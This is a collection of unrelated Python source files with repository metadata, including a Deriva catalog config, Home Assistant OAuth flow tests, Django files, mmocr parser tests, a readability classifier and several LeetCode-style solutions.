8a9a097acec7f7248d2a0353f0e6c921b0e9d855 | 7298d1692c6948f0880e550d6100c63a64ce3ea1 | /deriva-annotations/catalog1/catalog-configs/Vocab/ihm_external_reference_info_reference_type_term.py | bfd555a03816d7b8e5783424965c8f5f426649a4 | [] | no_license | informatics-isi-edu/protein-database | b7684b3d08dbf22c1e7c4a4b8460248c6f0d2c6d | ce4be1bf13e6b1c22f3fccbb513824782609991f | refs/heads/master | 2023-08-16T10:24:10.206574 | 2023-07-25T23:10:42 | 2023-07-25T23:10:42 | 174,095,941 | 2 | 0 | null | 2023-06-16T19:44:43 | 2019-03-06T07:39:14 | Python | UTF-8 | Python | false | false | 6,342 | py | import argparse
from deriva.core import ErmrestCatalog, AttrDict, get_credential, DerivaPathError
from deriva.utils.catalog.components.deriva_model import DerivaCatalog
import deriva.core.ermrest_model as em
from deriva.core.ermrest_config import tag as chaise_tags
from deriva.utils.catalog.manage.update_catalog import CatalogUpdater, parse_args
groups = {
'pdb-reader': 'https://auth.globus.org/8875a770-3c40-11e9-a8c8-0ee7d80087ee',
'pdb-writer': 'https://auth.globus.org/c94a1e5c-3c40-11e9-a5d1-0aacc65bfe9a',
'pdb-admin': 'https://auth.globus.org/0b98092c-3c41-11e9-a8c8-0ee7d80087ee',
'pdb-curator': 'https://auth.globus.org/eef3e02a-3c40-11e9-9276-0edc9bdd56a6',
'isrd-staff': 'https://auth.globus.org/176baec4-ed26-11e5-8e88-22000ab4b42b'
}
table_name = 'ihm_external_reference_info_reference_type_term'
schema_name = 'Vocab'
column_annotations = {
'RCT': {
chaise_tags.display: {
'name': 'Creation Time'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RMT': {
chaise_tags.display: {
'name': 'Last Modified Time'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RCB': {
chaise_tags.display: {
'name': 'Created By'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'RMB': {
chaise_tags.display: {
'name': 'Modified By'
},
chaise_tags.generated: None,
chaise_tags.immutable: None
},
'ID': {},
'URI': {},
'Name': {},
'Description': {},
'Synonyms': {},
'Owner': {}
}
column_comment = {
'ID': 'The preferred Compact URI (CURIE) for this term.',
'URI': 'The preferred URI for this term.',
'Name': 'The preferred human-readable name for this term.',
'Description': 'A longer human-readable description of this term.',
'Synonyms': 'Alternate human-readable names for this term.',
'Owner': 'Group that can update the record.'
}
column_acls = {}
column_acl_bindings = {}
column_defs = [
em.Column.define(
'ID',
em.builtin_types['ermrest_curie'],
nullok=False,
default='PDB:{RID}',
comment=column_comment['ID'],
),
em.Column.define(
'URI',
em.builtin_types['ermrest_uri'],
nullok=False,
default='/id/{RID}',
comment=column_comment['URI'],
),
em.Column.define(
'Name', em.builtin_types['text'], nullok=False, comment=column_comment['Name'],
),
em.Column.define(
'Description',
em.builtin_types['markdown'],
nullok=False,
comment=column_comment['Description'],
),
em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
),
em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
),
]
visible_columns = {
'*': [
'RID', 'Name', 'Description', 'ID', 'URI',
['Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey'],
['Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey'], 'RCT', 'RMT',
['Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey']
]
}
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}
table_annotations = {
chaise_tags.table_display: table_display,
chaise_tags.visible_columns: visible_columns,
}
table_comment = 'A set of controlled vocabular terms.'
table_acls = {}
table_acl_bindings = {
'self_service_group': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['Owner'],
'projection_type': 'acl'
},
'self_service_creator': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['RCB'],
'projection_type': 'acl'
}
}
key_defs = [
em.Key.define(
['RID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RIDkey1')],
),
em.Key.define(
['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_IDkey1')],
),
em.Key.define(
['URI'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_URIkey1')],
),
]
fkey_defs = [
em.ForeignKey.define(
['Owner'],
'public',
'Catalog_Group', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey')],
acls={
'insert': [groups['pdb-curator']],
'update': [groups['pdb-curator']]
},
acl_bindings={
'set_owner': {
'types': ['update', 'insert'],
'scope_acl': ['*'],
'projection': ['ID'],
'projection_type': 'acl'
}
},
),
em.ForeignKey.define(
['RCB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey')],
acls={
'insert': ['*'],
'update': ['*']
},
),
em.ForeignKey.define(
['RMB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey')],
acls={
'insert': ['*'],
'update': ['*']
},
),
]
table_def = em.Table.define(
table_name,
column_defs=column_defs,
key_defs=key_defs,
fkey_defs=fkey_defs,
annotations=table_annotations,
acls=table_acls,
acl_bindings=table_acl_bindings,
comment=table_comment,
provide_system=True
)
def main(catalog, mode, replace=False, really=False):
updater = CatalogUpdater(catalog)
table_def['column_annotations'] = column_annotations
table_def['column_comment'] = column_comment
updater.update_table(mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
host = 'pdb.isrd.isi.edu'
catalog_id = 1
mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
catalog = DerivaCatalog(host, catalog_id=catalog_id, validate=False)
main(catalog, mode, replace)
| [
"brinda.vallat@rcsb.org"
] | brinda.vallat@rcsb.org |
97590902ea45bc7e04b8feaeccdb37e092426808 | 3520f9f1b6d804a6d95233493972bf04dca67fb4 | /revisited_2021/math_and_string/valid_anagram.py | 0d690178b7d6f34a5c35933bc51c1c498ce42777 | [] | no_license | Shiv2157k/leet_code | 8691a470148809f0a7077434abdc689f33958f34 | 65cc78b5afa0db064f9fe8f06597e3e120f7363d | refs/heads/master | 2023-06-17T02:59:20.892561 | 2021-07-05T16:42:58 | 2021-07-05T16:42:58 | 266,856,709 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
class Anagram:
def is_valid(self, s: str, t: str):
"""
Approach: Hash Table
Time Complexity: O(N)
Space Complexity: O(1)
:param s:
:param t:
:return:
"""
if len(s) != len(t):
return False
counter = [0] * 26
for i in range(len(s)):
counter[ord(s[i]) - ord("a")] += 1
counter[ord(t[i]) - ord("a")] -= 1
for count in counter:
if count != 0:
return False
return True
if __name__ == "__main__":
anagram = Anagram()
print(anagram.is_valid("rat", "tar"))
print(anagram.is_valid("", ""))
print(anagram.is_valid("a", "b")) | [
"shiv2157.k@gmail.com"
] | shiv2157.k@gmail.com |
c0d577a00e14252c2e94df73db2729d4a5836254 | 5963c12367490ffc01c9905c028d1d5480078dec | /tests/components/home_plus_control/test_config_flow.py | 4a7dbd3d3ee4e3f02c6a53aa014845151bec6ce1 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 6,431 | py | """Test the Legrand Home+ Control config flow."""
from unittest.mock import patch
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.components.home_plus_control.const import (
CONF_SUBSCRIPTION_KEY,
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_CLIENT_SECRET
from homeassistant.helpers import config_entry_oauth2_flow
from tests.common import MockConfigEntry
from tests.components.home_plus_control.conftest import (
CLIENT_ID,
CLIENT_SECRET,
SUBSCRIPTION_KEY,
)
async def test_full_flow(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check full flow."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": 60,
},
)
with patch(
"homeassistant.components.home_plus_control.async_setup_entry",
return_value=True,
) as mock_setup:
result = await hass.config_entries.flow.async_configure(result["flow_id"])
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "Home+ Control"
config_data = result["data"]
assert config_data["token"]["refresh_token"] == "mock-refresh-token"
assert config_data["token"]["access_token"] == "mock-access-token"
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert len(mock_setup.mock_calls) == 1
async def test_abort_if_entry_in_progress(hass, current_request_with_host):
"""Check flow abort when an entry is already in progress."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
# Start one flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
# Attempt to start another flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_in_progress"
async def test_abort_if_entry_exists(hass, current_request_with_host):
"""Check flow abort when an entry already exists."""
existing_entry = MockConfigEntry(domain=DOMAIN)
existing_entry.add_to_hass(hass)
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
"http": {},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "single_instance_allowed"
async def test_abort_if_invalid_token(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check flow abort when the token has an invalid value."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": "non-integer",
},
)
result = await hass.config_entries.flow.async_configure(result["flow_id"])
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "oauth_error"
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
64ab6dc9d426016042fc73847036810389e9d621 | 1f244254465ce36f116b7d1c255f9a9ae9594bb4 | /typeidea/typeidea/wsgi.py | 859bfc426728341b7d6955eef2c8ef45d9865831 | [] | no_license | sunye088/typeidea | a45e7093b3b553fd38a5a6ba1971a7e3651cb161 | 2b84392e926fd72b1975947626db7362f0729a5c | refs/heads/master | 2023-04-29T15:20:18.049406 | 2019-11-30T13:31:39 | 2019-11-30T13:31:39 | 226,258,490 | 0 | 0 | null | 2023-04-21T20:41:54 | 2019-12-06T06:10:25 | Python | UTF-8 | Python | false | false | 532 | py | """
WSGI config for typeidea project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'typeidea.settings')
profile =os.environ.get('TYPEIDEA_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "typeidea.settings.%s" % profile)
application = get_wsgi_application()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
4bc76b786fe6931ca452ac6acf19df76b08600dd | 2898e585a2396738e49e33d322e8c65c823e6cf8 | /content/migrations/0073_comment.py | 0db929fda7cd4c263f7df602e0253eea7adf4179 | [] | no_license | kshutashvili/carshops | 4a4f384856c7cae6d09c9ca6e8b6c703ab88be80 | 885c6ed85d33c1cc9333ef9d224a3000b08959dc | refs/heads/master | 2022-12-12T12:50:49.618195 | 2018-02-22T18:04:00 | 2018-02-22T18:04:00 | 203,865,092 | 0 | 0 | null | 2022-11-22T02:24:12 | 2019-08-22T20:06:14 | JavaScript | UTF-8 | Python | false | false | 2,007 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-21 15:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('content', '0072_auto_20180220_1531'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='\u0418\u043c\u044f \u0442\u043e\u0433\u043e, \u043a\u0442\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('date', models.DateField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430')),
('content', models.TextField(verbose_name='\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='subitems', to='content.Comment', verbose_name='\u0420\u043e\u0434\u0438\u0442\u0435\u043b\u044c')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='content.Product', verbose_name='\u0422\u043e\u0432\u0430\u0440')),
],
options={
'verbose_name': '\u041e\u0442\u0437\u044b\u0432',
'verbose_name_plural': '\u041e\u0442\u0437\u044b\u0432\u044b',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
c6f06eb98d128fd78f6d7854db6a54d8e17d525b | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tests/test_datasets/test_preparers/test_parsers/test_wildreceipt_parsers.py | f4e5510db441116c73cc4881d23d270c83338ff1 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright (c) OpenMMLab. All rights reserved.
import json
import os.path as osp
import tempfile
import unittest
from mmocr.datasets.preparers.parsers.wildreceipt_parser import (
WildreceiptKIEAnnParser, WildreceiptTextDetAnnParser)
from mmocr.utils import list_to_file
class TestWildReceiptParsers(unittest.TestCase):
def setUp(self) -> None:
self.root = tempfile.TemporaryDirectory()
fake_sample = dict(
file_name='test.jpg',
height=100,
width=100,
annotations=[
dict(
box=[
550.0, 190.0, 937.0, 190.0, 937.0, 104.0, 550.0, 104.0
],
text='test',
label=1,
),
dict(
box=[
1048.0, 211.0, 1074.0, 211.0, 1074.0, 196.0, 1048.0,
196.0
],
text='ATOREMGRTOMMILAZZO',
label=0,
)
])
fake_sample = [json.dumps(fake_sample)]
self.anno = osp.join(self.root.name, 'wildreceipt.txt')
list_to_file(self.anno, fake_sample)
def test_textdet_parsers(self):
parser = WildreceiptTextDetAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
self.assertEqual(osp.basename(samples[0][0]), 'test.jpg')
instances = samples[0][1]
self.assertEqual(len(instances), 2)
self.assertIn('poly', instances[0])
self.assertIn('text', instances[0])
self.assertIn('ignore', instances[0])
self.assertEqual(instances[0]['text'], 'test')
self.assertEqual(instances[1]['ignore'], True)
def test_kie_parsers(self):
parser = WildreceiptKIEAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
3536260316053a84bfe9507e9c17029afa97708e | 3c9004d310ef124d6eb3872d7e6b02799a4dfbfb | /面向对象/多重继承.py | 33e0fe0390bccf03408e5f7415b2fa8bdc15166c | [] | no_license | iguess1220/python | c2eae6011a4806e4a7f68ef9351dbffc2d9635f3 | 3be7fd4e130247715bc89525b3ab66a755863480 | refs/heads/master | 2020-04-08T22:33:01.218992 | 2018-12-18T08:09:23 | 2018-12-18T08:09:23 | 112,563,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Animal:
pass
class Mammal(Animal):
def body(self):
print("eat milk")
class Bird(Animal):
def body(self):
print("有翅膀")
class Runable(Animal):
def run(self):
print("running")
class Flyable(Animal):
def fly(self):
print("fly")
class Bat(Mammal,Flyable):
pass
b = Bat()
b.fly()
class tuoniao(Bird,Runable,Flyable):
pass
c = tuoniao()
c.run()
c.body()
| [
"17710890916@163.com"
] | 17710890916@163.com |
b9c1b57faec38343cc0531c69ae241bf31fc54fd | bc8a0e87417add0325c9124ee847efaf88d2daa1 | /PycharmProjects/week5/coursera_forms/formdummy/views.py | 1409ed3df327284e005f02b1e0ab417cf904ce4c | [] | no_license | Ivanlasich/python | f0034426ea91d956d4d47a0a41e099785a6ddf1a | d8ed501537581f01d07733bd81911d0f523d7bfc | refs/heads/master | 2022-12-12T21:06:46.473608 | 2019-12-08T19:03:41 | 2019-12-08T19:03:41 | 226,704,894 | 0 | 0 | null | 2022-12-08T02:40:00 | 2019-12-08T17:28:07 | Python | UTF-8 | Python | false | false | 242 | py | from django.shortcuts import render
from django.views import View
import requests
class FormDummyView(View):
def get(self, request):
r = requests.get('https://api.github.com/events')
return render(request,'form.html',{})
| [
"ivanlazichny@gmail.com"
] | ivanlazichny@gmail.com |
3bc8e2ac6257c4f60d8e100e9230c5b365aa231f | c83fe2005a44b436a8be1e0787834a8a93b2024b | /scripts/dynamic_programming/longest_common_substring.py | 6c200f0878b158a8bb9db30e056545648c26fb10 | [] | no_license | wulfebw/algorithms | 9eb0bacd8a7851d28beecb608a895925e26f543b | cbae6aba464a021ada842adb4eaed9dbd16dc0f2 | refs/heads/master | 2021-01-19T02:28:12.666777 | 2019-05-02T02:52:08 | 2019-05-02T02:52:08 | 49,041,959 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | '''
I think the difference between finding the lcsubstring and lcsubseq is that in the substring case you erase your progress, whereas with the subsequence you do not
'''
import numpy as np
def lcs(a,b):
n, m = len(a), len(b)
v = np.zeros((n+1, m+1))
for i in range(n):
for j in range(m):
if a[i] == b[j]:
v[i+1,j+1] = v[i,j] + 1
return int(v.max())
if __name__ == '__main__':
inputs = [
('GeeksforGeeks', 'GeeksQuiz'),
('abcdxyz', 'xyzabcd'),
('zxabcdezy', 'yzabcdezx'),
('aabbbccccddd', 'dddddbbbbbbaaaaacccc')
]
expect = [
5,
4,
6,
4
]
for (i,e) in zip(inputs, expect):
print(e)
print(lcs(*i))
print()
| [
"wulfebw@stanford.edu"
] | wulfebw@stanford.edu |
5fecb3d42317d7666bb4cf7e590626bd078063ef | d7998eacdd2ecd9623b520ec1c36524a2c3ab827 | /conwhat/__main__.py | 86cee1f77db13de34af7a5a1156f2579c0a8759e | [
"BSD-3-Clause"
] | permissive | raamana/ConWhAt | d50674e3d790704d8105eb69dfa96e8164c0c402 | 098ae8088f6d320ed414355be3d31a65b8bf43de | refs/heads/master | 2021-08-20T00:35:54.446433 | 2017-11-27T20:17:13 | 2017-11-27T20:17:13 | 112,232,400 | 0 | 0 | null | 2017-11-27T18:26:35 | 2017-11-27T18:26:34 | null | UTF-8 | Python | false | false | 488 | py |
def main():
"Entry point."
raise NotImplementedError('The command line interface for ConWhAt is not currently supported. '
'Please use it via API in a script or jupyter notebook. \n'
'Example usages : \n'
'from conwhat import StreamConnAtlas \n'
'from conwhat import VolConnAtlas \n'
'')
if __name__ == '__main__':
main() | [
"raamana@gmail.com"
] | raamana@gmail.com |
f00f2c84d5ce3a1e7902935d2bd5bc439c1b790b | 59212f32b5b3a274fde0875101b37aafe72891f1 | /crawller/selenium_base/classifier.py | 4da4ec8aaf59ec25d2fcb3bff2b7ea2920d5af49 | [] | no_license | afcarl/rehabilitation | b2dd1626deaa606469d7150982f130a2272dd3b0 | 67c6719d805201e0c9ee97fe9130398a9b93881a | refs/heads/master | 2020-03-22T09:59:09.623992 | 2017-02-03T01:06:05 | 2017-02-03T01:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | from sklearn.feature_extraction.text import CountVectorizer
import json
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
import random
from nltk.tokenize import sent_tokenize, word_tokenize
from functools import reduce
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import chi2
from sklearn.feature_selection import SelectKBest
from sklearn import tree
from sklearn import linear_model
def get_dataset_stat_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
dataset["target"].append(idx)
idx += 1
grades.clear()
return dataset
def get_dataset_text_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
loop_idx = idx
#while loop_idx >= 0:
dataset["data"].append(text)
dataset["target"].append(idx)
# loop_idx -= 1
idx += 1
grades.clear()
return dataset
def get_sample_dataset():
dataset = {}
dataset["data"] = []
dataset["target"] = []
dataset["data"] = ["a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","c cc","cc ","c ","cc ","c ","c "]
dataset["target"] = [1,1,1,1,1,1,1,1,1,1,1,1,3,3,3,3,3,3]
return dataset
def get_dataset_text_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["data"].append(text)
dataset["target"].append(grade)
return dataset
def get_dataset_stat_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["target"].append(grade)
text = "".join([text, " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
return dataset
dataset1 = get_dataset_text_all()
dataset2 = get_dataset_stat_all()
print("finish get dataset")
ngrams = [2,3,4,5,6,7]
Cs = [10]
features = [100000, 150000,200000,240000]
# samp_order = random.sample(range(len(y)),len(y))
# X = [X[ind] for ind in samp_order]
# y = [y[ind] for ind in samp_order]
if False:
import pydotplus
print("for interpretation")
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, 20))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
X1 = X1.todense()
X = np.append(X1, np.matrix(X2), axis=1)
#populate col names
cols = ["UNK"] * X.shape[1]
for word, idx in count_vect.vocabulary_.items():
cols[idx] = word
cols[len(cols) - 1] = "Word Average"
cols[len(cols) - 2] = "Sentence Average"
classes = ["grade 2-3", "grade 4-6", "grade 7-8", "grade 9-10", "grade 11-12"]
clf = tree.DecisionTreeClassifier(criterion = "entropy")
clf.fit(X, y)
dot_data = tree.export_graphviz(clf, out_file=None, feature_names=cols, class_names=classes, filled=True, rounded=True, special_characters=True)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf("tree2.pdf")
if True:
for feature in features:
for ngram in ngrams:
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, ngram))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# print("finish", "transform")
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
if feature < X1.shape[1]:
X1 = SelectKBest(chi2, k=feature).fit_transform(X1, y)
X1 = X1.todense()
# print("finish", "Kbest")
X = np.concatenate((X1, np.matrix(X2)), axis=1)
# print("finish", "append")
#for c in Cs:
key = " ".join(["feature", str(feature), "c", str(10), "ngram", str(ngram)])
try:
clf = tree.DecisionTreeClassifier()
# clf = LogisticRegression(multi_class='ovr', C=10)
# clf = svm.SVC(C=c, kernel='linear')
scores = cross_val_score(clf, X, y, cv=10, n_jobs=1, verbose=0)
print(key, reduce(lambda x, y: x + y, scores) / len(scores))
except Exception as exp:
print("error: ", key, "\t", exp)
| [
"zhaosanqiang916@gmail.com"
] | zhaosanqiang916@gmail.com |
b9b83013d4f1fab6c0ae403a06f74021bb5f9f05 | dec494542217437afa7f38e8703328b25b183cb8 | /999.py | 207d2953c1b147a171c8398e49277b1fa5063386 | [] | no_license | Transi-ent/LeetcodeSolver | ee44c9c4d5bce9f11c079c5b27b4b967790cb5cd | a89e19753666657a6f15c1be589b9b2dbd4b6c84 | refs/heads/master | 2021-04-16T20:37:34.710175 | 2021-02-24T03:51:43 | 2021-02-24T03:51:43 | 249,383,432 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | class Solution:
"""
先进行遍历,求出白车所在的位置(Row,Col),
再次进行遍历,查询所在的行和列可以捕获的卒
"""
def numRookCaptures(self, board: list) -> int:
r, c = None, None
flag = False
for i in range(8):
for j in range(8):
if board[i][j]=="R":
r, c = i, j
flag = True
break
if flag:
break
up, down, left, right = 0,0,0,0
hasBishop = False
for i in range(8):
for j in range(8):
if j==c and i<r:
if board[i][j]=="B":
up = 0
elif board[i][j]=='p':
up = 1
elif i==r:
if j<c:
if board[i][j]=='p':
left = 1
elif board[i][j]=="B":
left = 0
elif j>c:
if board[i][j]=="B":
break
elif board[i][j]=='p':
right = 1
elif i>r and j==c:
if board[i][j]=='B':
hasBishop = True
break
elif board[i][j]=='p':
down = 1
if hasBishop:
break
return up+down+left+right
| [
"1305113016@qq.com"
] | 1305113016@qq.com |
